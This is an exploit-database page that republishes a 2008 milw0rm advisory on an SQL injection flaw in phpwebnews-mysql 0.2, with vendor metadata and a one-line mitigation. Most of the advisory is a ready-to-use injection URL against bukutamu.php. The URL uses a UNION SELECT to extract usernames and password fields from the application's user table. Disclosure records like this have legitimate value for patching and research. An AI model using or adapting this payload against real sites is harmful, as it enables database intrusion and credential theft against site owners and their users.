header-logo
Suggest Exploit
vendor:
phpwebnews-mysql
by:
Virangar Security Team
9.3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phpwebnews-mysql
Affected Version From: 0.2
Affected Version To: 0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:codewalkers:phpwebnews-mysql
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

phpwebnews-mysql 0.2 SQL Injection Vulnerability

A SQL injection vulnerability was discovered in phpwebnews-mysql 0.2. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

#######################################################################################
#                                                                                                                                                                 
#        ...:::::phpwebnews-mysql 0.2  SQL Injection Vulnerability ::::....                                           
#                                                                                                                                                                 
#######################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir
=================================================================================
Discoverd By :virangar security team

User In Virangar : d4v00d_cr4ck3r
=================================================================================
Special TNX To:Mr.nosrati,H4di.H4di,black.shadowes,Mr.hesy,Zahra

& All virangar Members & All hackerz
 =================================================================================
Download:
http://www.codewalkers.com/codefiles/476_phpwebnews-mysql.zip
 =================================================================================
expl0it:
http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,user,passwd,5,6,7/**/from/**/user/*
 =================================================================================
Young Iranian h4ck3rz
=================================================================================

# milw0rm.com [2008-07-03]

Navigation

Suggest Exploit

Services By CQR